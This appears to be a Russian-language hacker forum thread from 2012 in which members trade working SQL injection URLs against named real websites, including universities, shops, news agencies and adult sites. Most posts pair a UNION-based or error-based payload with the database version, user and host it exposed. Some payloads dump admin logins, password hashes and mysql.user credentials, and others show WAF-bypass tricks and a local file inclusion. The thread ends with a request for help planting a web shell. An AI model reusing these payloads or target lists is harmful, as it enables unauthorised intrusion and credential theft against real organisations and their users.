www.lovemarks.com/index.php?pageID=20026&_fr_collectionid=36&_fr_collection1id=-147+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13,14+--+
Code:
5.0.77:ssl_mysql@localhost:svl_lovemarks_stage
cminds.org PR-5
Code:
www.cminds.org/index.php?option=com_discussions&view=thread&catid=2:demo-forum&thread=1'+union+all+select+1,2,3,4,5,6,7,8,9,conca t_ws(0x3a,version(),user(),database()),11,12,13,14 ,15,16,17,18,19,20,21,22,23--+a
Code:
5.0.91mm-log:cminds27_jo151@localhost:cminds27_jo151
azbuk.net ТИЦ-110
Code:
http://www.azbuk.net/newbook/print.php?num=-13556+union+select+1,concat_ws(0x3a,version(),user (),database()),3+--+
Code:
5.1.29-rc:sat_book@195.248.234.87:sat_book
Тиц:10 PR:6
Code:
http://www.rssmix.com/engine.php?mix_id=-1+union+select+concat(user,0x3a,password)+from+mys ql.user+limit+0,1+--+
Тиц:0 PR:5
Code:
http://www.phparchitecture.com/howto_show.php?id=-1+union+select+1,2,concat(usrName,0x3a,usrPassword ),4,5+from+paAdmin+--+
Тиц:1100 PR:8 .edu
Code:
http://www.usc.edu/schools/price/faculty/detail.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20+--+
Тиц:700 PR:4
Code:
http://iran.ru/rus/print_news.php?news_id=-1+union+select+1,version(),3,4,5,6,7,8+--+
Тиц:220 PR:4
Code:
http://kinosalut.ru/movie.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,10,11,12,13+--+
Тиц:0 PR:4
Code:
http://romanykultury.info/news/news.php?row=-333+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5
HellFire
10.02.2012, 14:40
Карл Девис (композитор).
Code:
http://www.carldaviscollection.com/gallery2.php?category_id=1-0.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Dat abase(),0x2F2A2A2F,User()),3,4,5,6--
Внутри много БД соседей.
Database Version: 5.1.53-log
Database name: carldavis
User name: labelstream@gubancspub.com
ТИЦ: 0
PR: 5
Торговая площадка.
Code:
http://trade-world.org/company_leads.php?id=3581359&file=Selling&prod=prod&cat_id=1-0.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Dat abase(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10--
Database Version: 5.1.51-log
Database name: tradeworld
User name: tradeworld@localhost
ТИЦ: 0
PR: 3
ССПП ЗАО «Сортсемовощ» (Санкт-Петербург).
Code:
http://www.e-seed.ru/index.php?id=4&tip=1-0.1+UNION+SELECT+1,2,3,4,5,CONCAT(Version(),0x2F2A 2A2F,Database(),0x2F2A2A2F,User()),7,8,9,10,11,12, 13,14,15,16--
Database Version: 4.0.27-max-log
Database name: euromart_seed
User name: euromart_seed@v24.valuehost.ru
ТИЦ: 40
PR: 2
totenkopf
11.02.2012, 13:52
Code:
https://007airsoft.com/category.php?cat=2+and+0+UNION+SELECT+1,2,3,4,conc at_ws(0x3a,user(),version(),database())+--+
http://aaminc.com/category.php?cat=2&id=81+and(select+1+from(select+count(*),concat((co ncat_ws(0x3a,user(),version(),database())),floor(r and(0)*2))x+from+information_schema.tables+group+b y+x)a)+--+
http://americansportreview.com/manufacturers.php?cat=2&subcat=10+and(select+1+from(select+count(*),concat ((concat_ws(0x3a,user(),version(),database())),flo or(rand(0)*2))x+from+information_schema.tables+gro up+by+x)a)+--+
http://andrews-tiles.co.uk/view_category.php?cat=2'+and+0+UNION+SELECT+1,2,co ncat_ws(0x3a,user(),version(),database()),4,5+--+
http://www.antiquesoftheindies.com/category.php?cat=2+and+0+/*!UNION*/+/*!SELECT*/+1,concat_ws(0x3a,user(),version(),database()),3,4 +--+
http://bartharris.com/detail.php?cat=5&page=1&id=628)+and+0+UNION+SELECT+1,concat_ws(0x3a,user() ,version(),database()),3,4+--+ page body img link
http://bash.net.au/category.php?cat=2+and+0+UNION+SELECT+1,2,3,4,5,6, concat_ws(0x3a,user(),version(),database()),8+--+
http://www.beautydesign.com/category.php?product_category=Island-Stations&cat=25'+and+0+UNION+SELECT+1,concat_ws(0x3a,user() ,version(),database()),3,4,5,6,7,8,9,10,11,12,13+--+
http://cadogan-gifts.com/ViewCategory.php?cat=2+and+0+UNION+SELECT+1,2,3,co ncat_ws(0x3a,user(),version(),database()),5+--+
http://caribee.com/product.php?prd=43+and+0+UNION+SELECT+1,2,3,4,5,6, concat_ws(0x3a,user(),version(),database()),8,9,10 ,11,12+--+
http://classifieds.up.net/detail.php?cat=2&de=37493+and(select+1+from(select+count(*),concat( (binary(concat_ws(0x3a,user(),version(),database() ))),floor(rand(0)*2))x+from+geeklog.user+group+by+ x)a)
http://community.caithness.org/category.php?cat=2+and+0+UNION+SELECT+concat_ws(0x 3a,user(),version(),database()),2,3,4,5,6+--+
http://destroyedbrand.com/category.php?cat=2)+and+0+UNION+SELECT+1,concat(us er(),0x3a,version(),0x3a,database())+--+
http://dnd.thesepixels.com/photo_moreinfo.php?image=322+and+0+/*!UNION*/+/*!SELECT*/+1,2,3,4,concat_ws(0x3a,user(),version(),database( )),6,7+--+
http://floridachain.org/issues-category.php?imagen=fuck&cat=2'+and(select+1+from(select+count(*),concat((b inary(concat_ws(0x3a,user(),version(),database())) ),floor(rand(0)*2))x+from+information_schema.table s+group+by+x)a)+--+
http://furnituredirect.com.au/site/category.php?cat=2+and+0+UNION+SELECT+1,2,concat_w s(0x3a,user(),version(),database())+--+
http://galacticpharm.com/getcategory.php?cat=5'+and+0+UNION+SELECT+1,2,3,bi nary(concat_ws(0x3a,user(),version(),database())), 5+--+
http://gamerbattles.com/category.php?cat=2+and(select+1+from(select+count( *),concat((concat_ws(0x3a,user(),version(),databas e())),floor(rand(0)*2))x+from+information_schema.t ables+group+by+x)a)
http://genessee-avenue.org/GA_Web/Display_Ministry.php?min=17+and+0+UNION+SELECT+1,2 ,3,4,5,binary(concat_ws(0x3a,user(),version(),data base())),7/*
http://gotsales.com/category.php?cat=2+and+0+UNION+SELECT+1,2,concat_w s(0x3a,user(),version(),database())+--+
http://gryubieranki.eu/category.php?page=4&cat=2+and(select+1+from(select+count(*),concat((co ncat_ws(0x3a,user(),version(),database())),floor(r and(0)*2))x+from+information_schema.tables+group+b y+x)a)+--+
http://halftimegames.com/category.php?cat=2+and+0+/*!UNION*/+/*!SELECT*/+1,2,concat_ws(0x3a,user(),version(),database()),4 ,5,6,7,8,9,10,11,12,13+--+
http://horstwelding.com/hla_category.php?cat=2'+and+0+UNION+SELECT+1,2,3,4 ,5,6,7,8,concat_ws(0x3a,user(),version(),database( )),10+--+
Шоп с косметикой
Code:
hxxp://www.mybeautycenter.com/customer_testimonials.php?testimonial_id=5%20union %20select%201,2,3,4,5,concat(0x3a,customers_passwo rd),7,8,9,10,11%20from%20customers
BLurpi^_^
12.02.2012, 02:35
ТИЦ-10
ПР-5
http://www.cowboysofcolor.org/profile.php?ID=6+union+select+1,2,version(),4--
anonym_di
12.02.2012, 17:36
Информационное агентство "Интерфакс-Казахстан"
Code:
www.interfax.kz/?lang=rus&int_id=13&category=currently&news_id=-138+union+select+1,2,3,group_concat(0x3C62723E,ver sion(),0x3C62723E,user(),0x3C62723E,database()),5, 6,7,8,9,10,11
Тиц:950
PR:6
HellFire
12.02.2012, 18:36
Что-то про электрику.
Code:
http://www.super-electric.com/Consumer/ceilingfans.php?id=1-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,CONCAT(Version(), 0x2F2A2A2F,Database(),0x2F2A2A2F,User()),11,12,13, 14,15,16,17,18,19,20--
File_Priv = Y
Database Version: 5.1.35-community
Database name: super electric
User name: root@localhost
ТИЦ: 0
PR: 5
ГУФ ТУТ!111
Code:
http://guf.org.ua/vive.php?cat=4&id=107+union+select+1,2,3,4+--+
Gufon:291297dan
HellFire
12.02.2012, 19:43
SPIROL International Corporation.
Code:
http://www.spirol.com/company/news/press_d.php?ID=1-1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Databas e(),0x2F2A2A2F,User()),2,3,4,5,6,7,8,9,10,11--
Database Version: 5.1.52
Database name: spirol
User name: root@localhost
ТИЦ: 10
PR: 3
BLurpi^_^
12.02.2012, 22:46
[Inf from DB] -> [ User: u52540@10.8.0.148 Database: u52540 Version: 5.0.90-log ]
[Vulnberable URL] ->
[http://www.flaginfo.ru/news.php?id=-1+union+select+1,2,group_concat(0x3C494E4A5F494E46 4F3E,user(),0x3a,database(),0x3a,version(),0x3C494 E4A5F494E464F3E),4,5,6--]
[ ТиЦ ] -> [0]
[Yandex PR] -> [0]
[Alexa TR] -> [Unknown]
[DIRS]
[http://www.flaginfo.ru/info.php] -> [200]
[Inf from DB] -> [ User: 1gb_bmw999@10.0.1.14 Database: 1gb_bmw999 Version: 5.0.45-community-nt-log ]
[Vulnberable URL] ->
[http://www.bmw999service.ru/news/news.php?id=-12+union+select+1,2,group_concat(0x3C494E4A5F494E4 64F3E,user(),0x3a,database(),0x3a,version(),0x3C49 4E4A5F494E464F3E),4,5,6--]
[ ТиЦ ] -> [10]
[Yandex PR] -> [2]
[Alexa TR] -> [Unknown]
[DIRS]
[stranger]
13.02.2012, 01:39
http://www.antikvar.su/index.php?http_id_prod=-899+union+select+1,concat_ws(0x3b,user(),database( ),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 +--+
u36801@10.8.1.171;u36801;5.0.90-log
http://www.gornitsa.ru/index.php?cat='+union+select+1,2,3,4,concat_ws(0x3 b,user(),database(),version())+--+
gornitsaru@localhost;gornitsaru;5.0.26-log
Code:
http://www.visoflora.com/index.php?option=com_visoflora&task=grainevariete&id=-67+UNION+SELECT+1,2,3,4,5,6,concat_ws%280x3a,user% 28%29,version%28%29,database%28%29%29,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54%20from%20jos_users--&Itemid=10
Username: visofloracom@localhost
Version: 5.0.51a-24+lenny5-log
Database: visofloracom
Google PR: 5 GooglePage: 1,060,000
Joomla
[stranger]
13.02.2012, 18:38
http://silverspoons.ru/?p=catalog&action=show&id=724+or+1+group+by+concat(user(),0x3b,database() ,0x3b,version(),floor(rand(0)*2))+having+min(0)+--+
silverspoons@localhost;silverspoons;5.1.54-1ubuntu41
totenkopf
15.02.2012, 22:28
Code:
http://hpbikes.com/news.php?id=74+and+0+UNION+SELECT+1,2,concat_ws(0x 3a,user(),version(),database()),4,5,6,7,8,9,10,11, 12+--+
http://www.sncorp.com/press_more_info.php?id=468+and+0+UNION+SELECT+1,2, concat_ws(0x3a,user(),version(),database()),4,5,6, 7,8,9,10,11+--+
http://www.rfidjournalevents.com/virtual_agenda.php?eid=9'+and+0+UNION+SELECT+1,con cat_ws(0x3a,user(),version(),database()),3,4,5,6,7 ,8,9,10,11,12,13+--+
http://www.profitchoice.com/webdir/dir_display.php?cat_id=13'+and+0+UNION+SELECT+conc at_ws(0x3a,user(),version(),database())+--+
http://www.theshiva.net/resources.php?category_id=19+and+0+/*!UNION*/+/*!SELECT*/+concat_ws(0x3a,user(),version(),database())+--+
http://www.synchronica.com/p/announcement.php?id=42+and+0+UNION+SELECT+1,2,conc at_ws(0x3a,user(),version(),database()),4,5,6+--+
http://www.amtelnet.com/news/newsarticle.php?id=800537967+and+0+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),datab ase()),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
http://www.tarksheel.com/articles.php?aid=5+and+0+UNION+SELECT+1,2,3,4,conc at_ws(0x3a,user(),version(),database()),6,7,8,9,10
http://www.sussexmedicalchambers.co.uk/articles.php?aid=15'+and+0+UNION+SELECT+1,2,3,4,5, 6,concat_ws(0x3a,user(),version(),database()),8+--+
http://www.spinsnap.com/articles.php?aid=88+and+0+UNION+SELECT+1,2,3,conca t_ws(0x3a,user(),version(),database()),5,6,7,8,9,1 0,11,12+--+
http://www.sotder.org/health_articles.php?aid=665+and+0+UNION+SELECT+1,2 ,concat_ws(0x3a,user(),version(),database())+--+
http://www.seomanualsubmission.com/seo-link-building-articles.php?aid=7+and+0+/*!UNION*/+/*!SELECT*/+1,concat_ws(0x3a,user(),version(),database()),3,4 ,5,6,7,8,9,10,11,12+--+
http://www.pongworld.com/articles/articles.php?aid=21+and+0+UNION+SELECT+1,concat_ws (0x3a,user(),version(),database()),3,4,5+--+
Code:
http://www.antibiotic.ru/news.php?y=2011 or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1+--+
тиц 1400, pr 5
SecondLife
16.02.2012, 03:37
Code:
http://www.chale.ru/pts/admin/index.php?action=edit&categoryID=1&page=&link=0 union select 1,2,3,user(),5,6,7 -- a
Админка доступна почти без авторизации.
А веть я хотел купить у них палатку))))
http://www.lodki-palatki.ru/article.php?articleId=-19%20union%20select%20concat_ws(0x3a,@@version,use r(),database(),@@version_compile_os),2,3,4+--
5.0.92-log:lodkipa9_web@localhost:lodkipa9_webortbld-freebsd7.4
HellFire
16.02.2012, 18:55
Cпортивный видеопортал Екатеринбурга.
Code:
http://www.uralvideosport.ru/news.php?num=1488-14.88+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,D atabase(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10--
Внутри есть БД с информацией для подключения к FTP
Database Version: 5.0.32-Debian_7etch8-log
Database name: u6378
User name: root@localhost
ТИЦ: 150
PR: 4
Компания ОМЕГА - разработчик программного обеспечения.
Code:
http://www.omega.ru/pressreleases/view_relise.php?id=1-1.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Dat abase(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10,11--
Эти ребята делают ПО для СУБД ^^
Database Version: 4.0.27
Database name: news
User name: serg@zvm28.host.ru
ТИЦ: 375
PR: 3
ЧТУП "ПрофЭлектроника" - Поставщик систем безопасности в Беларуси.
Code:
http://www.pel.by/video_price_t.php?ID=1-0.1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,D atabase(),0x2F2A2A2F,User()),4,5,6,7,8--
Database Version: 5.0.92-community
Database name: sobby_sob2
User name: sobby_sob2@localhost
ТИЦ: 10
PR: 3
Институт Катона — американская исследовательская и просветительская организация.
Code:
http://www.cato.org/pressroom.php?display=news&id=1-1.1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Datab ase(),0x2F2A2A2F,User()),2,3,4,5--
Database Version: 5.1.56-rs
Database name: cato
User name: cato@192.168.1.3
ТИЦ: 300
PR: 7
Расово еврейский сайт.
Code:
http://www.torah.org/qanda/seequanda.php?id=666-666.666+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT (CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F ,User()),0x71),0x71),5,6,7,8,9,10,11--
Database Version: 4.1.11-Debian_etch1-log
Database name: jln
User name: upd_sub@web-1.capalon.internal
ТИЦ: 40
PR: 6
Mohammad Ali Jinnah University.
Code:
http://jinnah.edu/academic.php?id=1-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,CONCAT(Vers ion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),13, 14,15,16,17,18,19,20--
File_Priv = Y
Но там уже кто-то тусовался (http://www.jinnah.edu/images/Hacked-.html) ...
Database Version: 5.5.15
Database name: maju
User name: root@localhost
ТИЦ: 0
PR: 6
Skofield
18.02.2012, 20:20
http://www.fap.pdx.edu/floorplans/detail.php?buildingID=-13'+union+select+1,2,3,4,5,6,7,version(),9,0,11,12 ,13,14,15,16--+
Database Version: 5.0.77
Database name: fapws
User name: fapws_r@jotunheim.oit.pdx.edu
HAXTA4OK
20.02.2012, 17:43
Инъекции вида:
Код:
http://site.ru/index.php?a='
будут удаляться.
какой то там университет Брюселя внутри таблы экзаменов за 2012 и т д (админку было искать лень)
Code:
http://huis.vub.ac.be/lessenlees.php?lescode=-117+union+select+1,concat(username,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29+from+RageUsers+limit+1,1--+
BLurpi^_^
21.02.2012, 00:16
тИЦ:140
http://lazalka.ru/unit.php?id=-1+UNION+SELECT+concat%28version%28%29,user%28%29%2 9,2,3,4,5,6,7,8,9,10--
Вывод в соурсе:
в админку не пускает((( не нравится мой айпи((( http://101rabota.ru/admin/
http://www.101rabota.ru/allrez.php?showgr=-5+union+select+1,concat(login,0x3a,password),3333, 4,5+from+users_admin+limit+0,1+--+
Code:
http://www.uveitisclinicaltrials.com/index.php?option=com_sl&view=form&site_id=-30'+union+select+concat_ws(0x3a,username,password, usertype,0x4861636b6564206279204572656565)+from+jo s_users+limit+0,1--+f
SQL INJECTION (error-based) && Local File Include
Для проведения SQL Inj необходимо посылать кавычку не url-кодируя ее в %27.
В бд идет $_SERVER['REQUEST_URI'], так что ваши параметры не декодируются автоматически.
INSERT запрос.
Code:
http://www.zvuk.uu.ru/catalog/article.php?file=ololosha'or%28select/**/count%28*%29/**/from/**/%28select/**/1/**/union/**/select/**/2/**/union/**/select/**/3%29x/**/group/**/by/**/concat%28version%28%29,floor%28rand%280%29*2%29%29 %29and'
version(): 4.1.15-log
user(): 3wzvuk@deimos.surnet.ru
SAFE MODE = On
Инклуд картинки для примера:
Code:
http://www.zvuk.uu.ru/catalog/article.php?file=../../../catalog/images/logo.gif
Code:
http://www.ballarat.com/bookingservice/booking_request.php?id=-664+UNION+SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,8 4,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 ,101,102,103,104,105,106,107,108,109,110,111,112,1 13,114,115,116,117,118,119,120,121,122,123,124,125 ,126,127+from+information_schema.tables+limit+16,1 +--+
Code:
http://www.justhotgayporn.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((se lect+concat_ws(0x3a,username,password,salt)+from+u sers+limit+0,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)and('a'='a
http://www.toptrannysex.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((se lect+concat_ws(0x3a,username,password,salt)+from+u sers+limit+0,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)and('a'='a
http://smoketube.tv/mobile/search/?q=1')and(select+1+from(select+count(*),concat((se lect+concat_ws(0x3a,username,password,salt)+from+u sers+limit+0,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)and('a'='a
http://www.bukkakevideos.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((se lect+concat_ws(0x3a,username,password,salt)+from+u sers+limit+0,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)and('a'='a
http://mobile.youngporngirlz.com/search/?q=1')and(select+1+from(select+count(*),concat((se lect+concat_ws(0x3a,username,password,salt)+from+u sers+limit+0,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)and('a'='a
http://mobile.pornstarblitz.com/search/?q=1')and(select+1+from(select+count(*),concat((se lect+concat_ws(0x3a,username,password,salt)+from+u sers+limit+0,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)and('a'='a
http://www.gay-bukkake.org/mobile/search/?q=1')and(select+1+from(select+count(*),concat((se lect+concat_ws(0x3a,username,password,salt)+from+u sers+limit+0,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)and('a'='a
http://mobile.boinktube.com/search/?q=1')and(select+1+from(select+count(*),concat((se lect+concat_ws(0x3a,username,password,salt)+from+u sers+limit+0,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)and('a'='a
http://www.justhotgayporn.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((se lect+concat_ws(0x3a,username,password,salt)+from+u sers+limit+0,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)and('a'='a
http://www.publicdomaintube.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((se lect+concat_ws(0x3a,username,password,salt)+from+u sers+limit+0,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)and('a'='a
http://www.standupcomedyspot.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((se lect+concat_ws(0x3a,username,password,salt)+from+u sers+limit+0,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)and('a'='a
http://www.freepornmarttube.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((se lect+concat_ws(0x3a,username,password,salt)+from+u sers+limit+0,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)and('a'='a
http://www.yuzhno-sakhalinsk.net/object.php?pg=2&type=-146%20union%20select%201,concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+--
5.1.41-log tiba102_info@212.193.227.175 tiba102_info portbld-freebsd7.2
Code:
http://www.blackco.net/modules.php?name=photo&u=Stalker%20XL&un=1&clan=BlackCompany'%20and%201=1+union+select%201,@@ version,3,4,5,6,7,8,9,10%20--%20f&sex=1&level=7&align=
YOU ARE SLAPPED BY NUKECOPS BY USING 'union' INSIDE 'name=photo&u=Stalker%20XL&un=1&clan=BlackCompany%27%20and%201=2%20union%20select% 201,2,3,4,5,6,7,8,9,10%20--%20f&sex=1&level=7&align='.
NUKECOPS, ох лол:
%0Aunion%0A
Code:
http://www.blackco.net/modules.php?name=photo&u=Stalker%20XL&un=1&clan=BlackCompany'%20and%201=1%0Aunion%0Aselect%20 1,@@version,3,4,5,6,7,8,9,10%20--%20f&sex=1&level=7&align=
http://uanato.info/imgs/logo.gif
В ТОПКУ
http://uanato.info/index.php?pokaz=-7690%20and%201=2%20union%20select%201,2,3,4,concat _ws(char(58),@@version,user(),database(),@@version _compile_os),6+--
4.1.22-standard-log ospuai_ospuai@localhost ospuai_nato pc-linux-gnu
Code:
http://gameleader.ru/showfull.php?gameid=-1262%27+union+select+1,2,3,4,version%28%29,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0--+f
HellFire
01.03.2012, 17:59
The Marian Library.
Code:
http://campus.udayton.edu/mary/resources/links/linkdisplay.php3?catnum=1-1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Databas e(),0x2F2A2A2F,User())--
Database Version: 5.0.41-log
Database name: marylinks
User name: mary@localhost
ТИЦ: 20
PR: 3
Официальный сайт коммерческого игрового движка Blitz3D.
Code:
http://www.blitzbasic.com/codearcs/codearcs.php?code=1-1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Dat abase(),0x2F2A2A2F,User()),4,5,6,7,8--
Database Version: 5.1.56-log
Database name: blitzbas_db
User name: blitzbas_bman@localhost
ТИЦ: 40
PR: 5
Code:
http://www.pocketgpsworld.com/sub-menu.php?idCat=9+or+1+group+by+concat(version(),fl oor(rand(0)*2))+having+min(0)+or+1+--+
http://www.emuanime.cl/tienda.php?id=-77'+union+select+1,concat(user_login,0x3a,user_pas s),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+fro m+wp_users+--+
http://www.donaticus-him.ru/view_product.php?id=-7'+union+select+1,2222,3,4,version()+--+
http://www.clovekvtisni.cz/index2en.php?id=642+and+1=0+union+select+1,concat( email,0x3a,password),3+from+users+--+
http://shadesoptical.com/blog.php?id=-24+union+select+1,concat(login,0x3a,pass),3,4,5,6, 7,8,9+from+shades_optical.users+limit+1,1+--+
http://www.webgari.com/top/siteinfo.php?count=6154%27+union+select+1,2,3,vers ion%28%29,5,6,7,8,9,0,1,2,3,4--+
gomos.org
http://gomos.org/index.php?id=-2+union+select+1,2,unhex%28hex%28concat_ws%280x3a, table_name,column_name%29%29%29,4,5,6+from+informa tion_schema.columns--+
Яндекс тИЦ (CY) 10
Alexa Rank 1,364,524 -85,214
Google PageRank (PR) 1
Code:
http://www.gavailer.ru/sites/index.php?id_site=-82+/*!union+select+1,2*/
Code:
http://tv.teletrade.com.ua/index.php?cat=12&subcat=999999.9'+union+all+select+1,concat(0x7e,0x 27,unhex(Hex(cast(database()+user()+as+char))),0x2 7,0x7e),2,3,4,5,6,7+and+'x'='x
^^^^^^^^^
Current User: root@localhost
Это:
http://www.teletrade.com.ua/ 275тиц 6pr
http://masterbrok.com.ua/ 30тиц 4pr
http://www.dengi-info.com/ 600тиц 4pr
http://tv.teletrade.com.ua/ 10тиц 3pr
И plesk бд и mysql included. Наслаждайтесь.
p.s. а я по таким крутым не лажу... вера не позволяет и skills. стремно.
p.s.s. буду благодарен за пару ненулевых сайтов с бубликами женской/детской тематики в приват =)
Интересный подзапрос.
Code:
http://www.hawk.ru/foto_gallery.php?id_gal=-27%20union%20select%200x27,0x2D3120756E696F6E20736 56C65637420312C636F6E6361745F777328307833622C64617 4616261736528292C7573657228292C76657273696F6E28292 92C332C342C35202D2D2066%20--%20f
PR=5
Code:
http://www.wallace.edu/student_resources/pathways/news_full_article.htm?id=-1+union+select+1,concat_ws%280x3a,host,user,passwo rd%29,3,4,5,6+from+mysql.user--
DB:
Code:
information_schema
administrator_documents
athletic
career_lab
cie
continuing_ed
deptpages
distance_ed
drupal
form_data
foundations
helpdesk
inventory
joomla
lrc
maintenance
mediawiki
messagebord
misrequest
mysql
offsitelinks
CY=550 PR=7
Code:
http://www.nd.edu/~ccl/news.php?id=-6+union+select+concat_ws%280x3a,database%28%29,use r%28%29,version%28%29%29,2,3,4,5+--+
Cennarios
06.03.2012, 05:28
Но комментс
http://www.flb.ru/index_open.php?info_id=-49931/**//*!union*//**//*!select*//**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+&kpk=1
winstrool
06.03.2012, 06:46
_http://www.trooder.com/directory/show.php?id=84015+union+select+1,2,3,4,5,6,7,8,(se lect(@x)from(select(@x:=0x00),(select(0)from(infor mation_schema.columns)where(table_schema!=0x696e66 6f726d6174696f6e5f736368656d61)and(0x00)in(@x:=con cat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3 a,column_name))))x),0,11,12,13,14,15,16,17,18,19+--+
_http://smaa-hq.com/bio.php?bioid=-21+union+select+1,2,version(),4,5,(select(@x)from( select(@x:=0x00),(select(0)from(information_schema .columns)where(table_schema!=0x696e666f726d6174696 f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62 723e,table_schema,0x2e,table_name,0x3a,column_name ))))x),7,8,99+--+
_http://www.libonline.ru/index.php?id=833399999999+union+select+1,2,version (),4,5,6,7+--+
pro-kinder.com.ua
http://pro-kinder.com.ua/index.php?w=addresses&id=1+or+1+group+by+concat%28%28select+table_name+f rom+information_schema.tables+limit+0,1%29,0x00,fl oor%28rand%280%29*2%29%29having+min%280%29+or+1--+
5.1.50
Яндекс тИЦ (CY) 70
Google PageRank (PR) 3
donbazar.ru
http://donbazar.ru/servs_list.php?serv=1&subcat=30+or+1+group+by+concat%28%28select+version %28%29%29,0x00,floor%28rand%280%29*2%29%29having+m in%280%29+or+1--+
5.1.49-rel11.3-log
Яндекс тИЦ (CY) 10
Google PageRank (PR) 1
PR 2
PHP:
http://masscool.com/category.php?pid=125%20union%20select%201,2,concat _ws%280x3a,@@version,user%28%29,database%28%29%29, 4,5,6,7,8--
PR 3
PHP:
http://wrigroup.ca/index.php?catid=-183%20UNION%20SELECT%20concat_ws%280x3a,username,p assword,email,accesslevel%29,CONCAT_WS%28CHAR%2832 ,58,32%29,user%28%29,database%28%29,version%28%29% 29+from+cfaq_admin
TIC 350
PR 5
Host IP: 77.221.130.20
Web Server: nginx/0.7.67
Powered-by: PHP/5.2.17
DB Server: MySQL >=5
http://www.bossmag.ru/view.php?id=%27+u nion+selec t+1,2,3,4,5,6,7 ,8,9,10,11, 12,1 3+--+
http://www.catholiccemeterieschicago.org/locations.php?id=-5+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20--
ccdata_user@ns2.rnsi.net
http://www.alberthammond.com/song.php?id=-412+union+select+1,user(),3,4,5,6,7,8,9--
ALBERT@LOCALHOST
foma9999
09.03.2012, 03:53
Code:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+15,1
//для вопросов есть другая тема
http://vvt-project.ru/index.php?rss_feed_id=-6+union+select+1,user(),3,4,5,6,7,8,9--
links_vvt@localhost
http://www.worstpreviews.com/headline.php?id=-15076+union+select+1,user(),3,4,5,6,7,8,9,10,11--
alexgi_2@localhost
HAXTA4OK:пости в одном посте
alexoffme
09.03.2012, 19:33
http://www.jadoo.com/game.php?id=4928+and+1=0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,user%28%29,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34%20--%20+
Тиц - 10
PR - 6
Кто сможет залить шелл отпишитесь как вы это сделали,если не трудно =) просто ради опыта.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot